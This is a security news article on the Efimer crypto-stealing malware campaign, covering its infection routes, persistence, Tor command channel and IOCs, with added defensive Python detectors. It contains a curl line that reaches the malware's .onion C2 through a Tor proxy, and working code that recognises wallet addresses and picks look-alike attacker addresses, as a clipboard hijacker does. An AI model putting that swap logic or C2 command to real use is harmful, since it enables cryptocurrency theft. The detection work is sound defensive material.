Efimer Malicious Script Spreads via WordPress Sites, Torrents, and Email in Massive Attack Wave

Kaspersky researchers have documented a widespread campaign built around Efimer, a malicious script that drops a clipboard-hijacking Trojan aimed at stealing cryptocurrency.

In the email wave first seen in June 2025, the messages impersonate legal correspondence from major companies, accuse the recipient of infringing on the sender's domain names, and carry a malicious archive that deploys the Efimer stealer.

Named after a comment found in its decrypted script, Efimer has been active since October 2024; it initially spread through compromised WordPress sites before expanding to email phishing and torrent lures.

This multi-vector approach had affected more than 5,000 users worldwide by July 2025, with Brazil recording the most infections (1,476), followed by India, Spain, Russia, Italy, and Germany.

Background and Initial Discovery

Kaspersky products detect the script under the verdicts HEUR:Trojan-Dropper.Script.Efimer, HEUR:Trojan-Banker.Script.Efimer, HEUR:Trojan.Script.Efimer, and HEUR:Trojan-Spy.Script.Efimer.gen, reflecting its roles as a dropper, a banking (clipboard) Trojan, a generic Trojan, and spyware.

The email lure is a phishing message alleging trademark violations, without naming any specific domain, that urges the victim to open a ZIP attachment such as "Demand_984175" (MD5: e337c507a4866169a7394d718bc19df9).

[Figure: part of the script, with the attackers' comments]

The ZIP holds a nested password-protected archive and a text file with the password, in which one letter is replaced by a Unicode look-alike (U+1D5E6, a mathematical sans-serif bold capital S, standing in for "S"). A tool that reads the password file and feeds it to an unpacker gets a string that looks right but does not open the archive, so automated extraction fails while a human typing the password succeeds.
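The following added example (written for this article, not code from the campaign or from Kaspersky) shows why the trick works and how an analysis pipeline can defeat it: the password string is read with the look-alike code point, NFKC normalization folds the mathematical letter back to ASCII "S", and a short list of candidate passwords is produced for the unpacker to try. The password value itself is an assumption for the example.

```python
import unicodedata

# Constructed sample, not the campaign's real password file: the string an
# automated unpacker would read from the bundled "password" text file. The first
# character is U+1D5E6 (MATHEMATICAL SANS-SERIF BOLD CAPITAL S), which renders
# like an ASCII "S" but is a different code point, so the archive will not open
# with the string exactly as read.
OBFUSCATED_PASSWORD = "\U0001D5E6ecret2025"


def non_ascii_lookalikes(s):
    """List every non-ASCII character as (index, char, code point, Unicode name, NFKC form).

    Anything reported here is a candidate homoglyph and explains why a password
    read straight from a file fails."""
    out = []
    for i, ch in enumerate(s):
        if ord(ch) > 0x7F:
            out.append((i, ch, f"U+{ord(ch):04X}",
                        unicodedata.name(ch, "<unnamed>"),
                        unicodedata.normalize("NFKC", ch)))
    return out


def fold_password(s):
    """NFKC normalization maps compatibility characters (mathematical alphanumerics,
    fullwidth forms, ligatures) onto their base letters: U+1D5E6 -> 'S'."""
    return unicodedata.normalize("NFKC", s)


def candidate_passwords(s):
    """Passwords an unpacker should try, in order: as read, NFKC-folded, and folded
    with any remaining non-ASCII characters dropped. Deduplicated, order kept."""
    folded = fold_password(s)
    ascii_only = "".join(ch for ch in folded if ord(ch) <= 0x7F)
    seen, out = set(), []
    for cand in (s, folded, ascii_only):
        if cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


if __name__ == "__main__":
    for idx, ch, cp, name, folded in non_ascii_lookalikes(OBFUSCATED_PASSWORD):
        print(f"offset {idx}: {cp} {name} -> {folded!r}")
    print("candidates:", candidate_passwords(OBFUSCATED_PASSWORD))
```

NFKC covers the mathematical alphanumeric block used here and the fullwidth and ligature forms commonly used for the same purpose; characters with no compatibility decomposition (Cyrillic or Greek look-alikes, for instance) survive the fold and have to be handled with a confusables table instead.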

Extracting it reveals "Requirement.wsf", which, when run, checks whether it has administrator privileges and installs the core Efimer component under C:\Users\Public\controller.

It adds Windows Defender exclusions for the controller folder, the script itself, and system executables such as cmd.exe.

Depending on the privilege level, it either registers a scheduled task from controller.xml or sets registry autorun keys for persistence, then displays a fake error message so the victim believes the document simply failed to open.
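A scheduled task created from an XML definition leaves an auditable artifact: `schtasks /Query /TN <name> /XML` exports any task in the same format. The added example below (not code from the campaign or from Kaspersky) parses such an export and flags the traits the article describes for the Efimer task: a script host as the action, a script living under C:\Users\Public, a hidden task, a request for the highest available run level, and a logon trigger. The sample task XML is constructed for the example and is an assumption about what controller.xml looks like, not a copy of it.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Process images and locations that are suspicious as the action of a persistent task.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\", "c:\\programdata\\", "\\temp\\")

# Constructed sample in Task Scheduler's export format. Trigger, run level and
# paths are assumptions modelled on the article's description, not the real controller.xml.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//B //Nologo "C:\Users\Public\controller\controller.js"</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# A benign vendor updater task for comparison (also constructed).
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>
"""


def audit_task(xml_text):
    """Return a list of human-readable findings for one exported task (empty if nothing stands out)."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_ in root.findall("t:Actions/t:Exec", NS):
        command = (exec_.findtext("t:Command", "", NS) or "").strip().strip('"')
        args = (exec_.findtext("t:Arguments", "", NS) or "").strip()
        image = ntpath.basename(command).lower()
        if image in SCRIPT_HOSTS:
            findings.append(f"script host as task action: {image}")
        for path in (command, args):
            if any(marker in path.lower() for marker in USER_WRITABLE):
                findings.append(f"runs content from a user-writable location: {path}")
                break
    if (root.findtext("t:Settings/t:Hidden", "", NS) or "").strip().lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")
    if (root.findtext("t:Principals/t:Principal/t:RunLevel", "", NS) or "").strip() == "HighestAvailable":
        findings.append("task requests highest available privileges")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("runs at every logon")
    return findings


if __name__ == "__main__":
    for name, xml_text in (("sample", SAMPLE_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, audit_task(xml_text) or ["no findings"])
```

On a live host, feed the function the output of `schtasks /Query /XML` for each task, or the files under C:\Windows\System32\Tasks, which use the same schema. The registry autorun branch of the installer is the complementary check: the Run and RunOnce keys under HKCU and HKLM should be reviewed for the same script-host-plus-Public-folder combination.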

Propagation Mechanisms

Efimer functions as a ClipBanker Trojan: it monitors the clipboard and replaces cryptocurrency wallet addresses with attacker-controlled ones for Bitcoin, Ethereum, Monero, Tron, and Solana.

It uses regular expressions to recognize addresses and swaps each one for an attacker address chosen to resemble it, for example one sharing the first two characters of a short Bitcoin address or the last character of a bc1q-prefixed one, so that a victim who only glances at the beginning or end of the pasted address sees nothing wrong.
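The added example below (written for this article; the script's own patterns are not reproduced by Kaspersky, so the regular expressions here are simplified approximations) shows the two halves of that logic: recognizing addresses in clipboard text and picking, from an attacker pool, the replacement that survives a glance. The attacker pool and the victim addresses are synthetic strings shaped like real addresses. The point for defenders is the last function: the only reliable check before sending funds is a comparison of the whole string, not its ends.

```python
import re

# Simplified address patterns for the example. Order matters: the specific Tron
# and Bitcoin forms are tried before the loose Solana pattern, which would also
# match them.
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
BECH32 = r"[02-9ac-hj-np-z]"
PATTERNS = [
    ("ETH", re.compile(r"0x[0-9a-fA-F]{40}")),
    ("BTC-bech32", re.compile(rf"bc1q{BECH32}{{38,58}}")),
    ("BTC-legacy", re.compile(rf"[13]{BASE58}{{25,34}}")),
    ("XMR", re.compile(rf"4[0-9AB]{BASE58}{{93}}")),
    ("TRX", re.compile(rf"T{BASE58}{{33}}")),
    ("SOL", re.compile(rf"{BASE58}{{32,44}}")),
]


def classify(token):
    """Return the address kind for a token, or None if it matches no pattern."""
    for kind, rx in PATTERNS:
        if rx.fullmatch(token):
            return kind
    return None


def detect_addresses(text):
    """Scan clipboard text and return [(kind, address)] for every wallet-shaped token."""
    return [(classify(tok), tok) for tok in re.findall(r"[0-9A-Za-z]+", text) if classify(tok)]


# Constructed attacker-controlled pool (synthetic strings, not real wallets).
ATTACKER_POOL = [
    "1BoatSLRHtKNngkdXEeobR76b53LETtpyT",
    "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
    "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4",
    "bc1qzyx2w3v4u5t6s7r8q9p0nmlkjhgfedcasaaaaq",
    "0xabababababababababababababababababababab",
]


def pick_lookalike(victim, pool=ATTACKER_POOL):
    """Choose the pool address most likely to pass a glance, as the article describes:
    same first two characters for a legacy Bitcoin address, same last character for
    a bc1q address; otherwise any address of the same kind. None if there is none."""
    kind = classify(victim)
    same_kind = [a for a in pool if classify(a) == kind]
    if not same_kind:
        return None
    if kind == "BTC-legacy":
        preferred = [a for a in same_kind if a[:2] == victim[:2]]
    elif kind == "BTC-bech32":
        preferred = [a for a in same_kind if a[-1] == victim[-1]]
    else:
        preferred = []
    return (preferred or same_kind)[0]


def glance_check_passes(original, pasted):
    """The check a hurried user makes. True means the swap goes unnoticed; a full
    string comparison (original == pasted) is the only reliable test."""
    kind = classify(original)
    if kind == "BTC-legacy":
        return original[:2] == pasted[:2]
    if kind == "BTC-bech32":
        return original[-1] == pasted[-1]
    return original[:2] == pasted[:2] and original[-1] == pasted[-1]


if __name__ == "__main__":
    victim = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
    swapped = pick_lookalike(victim)
    print(detect_addresses(f"send 0.1 BTC to {victim} today"))
    print(victim, "->", swapped, "glance passes:", glance_check_passes(victim, swapped))
```

The Solana pattern is the weak point of any such matcher: a bare base58 string of 32 to 44 characters is also what many unrelated tokens look like, which is why the malware's selection step only has to be plausible, not exact.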

The script talks to its command-and-control (C2) server over Tor: it downloads a Tor client from hardcoded URLs on compromised sites, then uses curl through the local SOCKS proxy on localhost:9050 to reach endpoints such as cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php.

Every 30 minutes the script polls the C2 with a GUID (e.g., vs1a-1a2b); the responses carry commands such as EVAL, which executes arbitrary code supplied by the server, or instructions for exfiltrating seed phrases.
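Two properties of that channel are easy to hunt for on an endpoint: a process that connects to the loopback Tor SOCKS port at a near-constant interval, and a curl command line that names a .onion host or a local SOCKS proxy. The added example below (written for this article, not code from the campaign or from Kaspersky) runs both checks over constructed telemetry; the event lines imitate Sysmon network-connection and process-creation records, the timings imitate the reported 30-minute poll, and the curl options are an assumption about how the script drives the proxy.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed events, not real telemetry: "<time> <image> <dest_ip>:<dest_port>".
CONNECTION_EVENTS = """\
2025-07-01T10:00:02 curl.exe 127.0.0.1:9050
2025-07-01T10:00:05 chrome.exe 142.250.74.110:443
2025-07-01T10:30:01 curl.exe 127.0.0.1:9050
2025-07-01T10:41:17 chrome.exe 142.250.74.110:443
2025-07-01T11:00:03 curl.exe 127.0.0.1:9050
2025-07-01T11:30:00 curl.exe 127.0.0.1:9050
2025-07-01T11:52:44 chrome.exe 172.217.16.142:443
2025-07-01T12:00:04 curl.exe 127.0.0.1:9050
"""

# Constructed process-creation command lines. The first uses the article's C2
# host; the --socks5-hostname option and the id parameter are assumptions.
COMMAND_LINES = [
    "curl.exe --socks5-hostname 127.0.0.1:9050 -s "
    "http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php?id=vs1a-1a2b",
    "curl.exe -s https://example.com/healthz",
    "powershell.exe -NoProfile -Command Get-Date",
]

SOCKS_PORTS = {9050, 9150}  # Tor's default SOCKS ports (daemon / Tor Browser bundle)
ONION_RE = re.compile(r"\b[a-z2-7]{56}\.onion\b", re.I)  # v3 onion service names
SOCKS_FLAG_RE = re.compile(r"--socks[45]\S*\s+(?:127\.0\.0\.1|localhost):(\d+)")


def find_beacons(events_text, min_count=3, max_cv=0.05):
    """Group connections by (image, destination) and report series whose inter-arrival
    times are nearly constant (coefficient of variation <= max_cv).
    Returns {(image, dest): mean_interval_seconds}."""
    series = defaultdict(list)
    for line in events_text.splitlines():
        ts, image, dest = line.split()
        series[(image, dest)].append(datetime.fromisoformat(ts))
    beacons = {}
    for key, times in series.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = avg
    return beacons


def local_socks_beacons(events_text):
    """Subset of find_beacons() whose destination is a loopback Tor SOCKS port."""
    out = {}
    for (image, dest), interval in find_beacons(events_text).items():
        host, _, port = dest.rpartition(":")
        if host == "127.0.0.1" and int(port) in SOCKS_PORTS:
            out[(image, dest)] = interval
    return out


def suspicious_command_lines(cmdlines):
    """Flag command lines naming a .onion host or routing through a local SOCKS port."""
    hits = []
    for cmd in cmdlines:
        m = SOCKS_FLAG_RE.search(cmd)
        if ONION_RE.search(cmd) or (m and int(m.group(1)) in SOCKS_PORTS):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for key, interval in local_socks_beacons(CONNECTION_EVENTS).items():
        print(f"beacon: {key[0]} -> {key[1]} every ~{interval:.0f}s")
    for cmd in suspicious_command_lines(COMMAND_LINES):
        print("suspicious:", cmd)
```

The interval test deliberately does not assume 30 minutes; it flags any low-jitter series, so a variant that changes the poll period is still caught, and the loopback filter keeps ordinary periodic traffic (update checks to remote hosts) out of the result.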

When it detects a mnemonic seed phrase, it takes a screenshot via PowerShell, saves it temporarily, and uploads it with its FileToOnion routine to paths such as /recvf.php.

Beyond theft, Efimer spreads itself through a set of auxiliary scripts.

One of them, btdlg.js (MD5: 0f5404aa252f28c61b08390d52b7a054), brute-forces WordPress administrator credentials: it builds wordlists from Wikipedia text, finds targets through Google and Bing searches, and confirms a successful login by publishing a test post through XML-RPC.

It runs up to 20 concurrent worker processes, locking each domain object so that no two workers attack the same site, and reports successful logins to the C2 with a GOOD command.
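From the site owner's side, this brute force is visible in the web server's access log as a burst of POST requests to /xmlrpc.php from one source. The added example below (written for this article, not Kaspersky's or the malware's code) parses combined-format log lines and flags sources whose XML-RPC POST rate exceeds a threshold in any sliding window. The log lines are constructed. Note that it counts requests rather than error statuses on purpose: a failed XML-RPC login is still an HTTP 200, with the fault inside the XML body.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip, ts, method, path, status, ua="Mozilla/5.0"):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 412 "-" "{ua}"'


def constructed_log():
    """Synthetic access log (constructed for this example): one source fires 25 XML-RPC
    POSTs in 48 seconds, a second sends three spread over ten minutes, plus page views."""
    lines = []
    for i in range(25):
        lines.append(_line("203.0.113.7", f"01/Jul/2025:10:00:{2 * i:02d} +0000", "POST", "/xmlrpc.php", 200))
    for minute in (0, 5, 10):
        lines.append(_line("198.51.100.4", f"01/Jul/2025:10:{minute:02d}:30 +0000", "POST", "/xmlrpc.php", 200))
    lines.append(_line("198.51.100.9", "01/Jul/2025:10:01:11 +0000", "GET", "/2025/04/some-post/", 200))
    lines.append(_line("198.51.100.9", "01/Jul/2025:10:01:12 +0000", "GET", "/wp-login.php", 200))
    return "\n".join(lines)


def parse(log_text):
    """Yield (ip, datetime, method, path, status) for each well-formed line."""
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if m:
            yield (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"]))


def xmlrpc_bursts(log_text, window_seconds=60, threshold=20):
    """Return {ip: peak_requests_in_window} for sources whose POST /xmlrpc.php count
    reaches the threshold inside any sliding window of window_seconds."""
    per_ip = defaultdict(list)
    for ip, when, method, path, _ in parse(log_text):
        if method == "POST" and path.split("?")[0] == "/xmlrpc.php":
            per_ip[ip].append(when)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, peak in xmlrpc_bursts(constructed_log()).items():
        print(f"{ip}: {peak} POST /xmlrpc.php in one 60 s window")
```

One request can carry many login attempts when the client wraps them in system.multicall, so a per-request threshold undercounts; if the site does not need XML-RPC for a mobile app or Jetpack-style integration, blocking /xmlrpc.php at the web server removes the attack surface entirely.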

The compromised sites are then used to host fake movie-download posts linking to password-protected torrents, which deliver Efimer disguised as an XMPEG media player (e.g., xmpeg_player.exe, MD5: 442ab067bf78067f5db5d515897db15c).

Another script, liame.js (MD5: eb54c2ff2f62da5d2295ab96eb8d8843), harvests email addresses from specified domains by parsing their pages for mailto: links, de-duplicates them, and exfiltrates the list for use in spam campaigns.

[Figure: sample Efimer phishing email]

A further variant, assembly.js (MD5: 100620a913f0e0a538b115dbace78589), adds virtual-machine detection, scans browser extensions for wallets, and supports commands such as KILL for self-removal.

The version distributed through torrents uses ntdlg.js (MD5: 627dc31da795b9ab4b8de8ee58fbf952), which extracts the Tor client as ntdlg.exe and adds the Defender exclusions through PowerShell.

According to the report, the malware uses WMI queries to watch for Task Manager so that its activity is not noticed there, and handles seed files in a way that ensures reliable exfiltration.

This infrastructure lets the attackers build a botnet of compromised sites for further compromises. Site owners should use strong passwords and two-factor authentication for WordPress and keep security software updated; users should avoid suspicious torrents and verify email senders before opening attachments.

Indicators of Compromise (IOC)

Malicious file hashes (MD5)
  39fa36b9bfcf6fd4388eb586e2798d1a  Requirement.wsf
  5ba59f9e6431017277db39ed5994d363  controller.js
  442ab067bf78067f5db5d515897db15c  xmpeg_player.exe
  16057e720be5f29e5b02061520068101  xmpeg_player.exe
  627dc31da795b9ab4b8de8ee58fbf952  ntdlg.js
  0f5404aa252f28c61b08390d52b7a054  btdlg.js
  b405a61195aa82a37dc1cca0b0e7d6c1  btdlg.js
  eb54c2ff2f62da5d2295ab96eb8d8843  liame.js
  100620a913f0e0a538b115dbace78589  assembly.js

Legitimate file used by the malware (MD5)
  5d132fb6ec6fac12f01687f2c0375353  ntdlg.exe (renamed Tor client)

Websites
  hxxps://lovetahq[.]com/sinners-2025-torent-file/
  hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip

C2 URLs
  hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion
  hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion
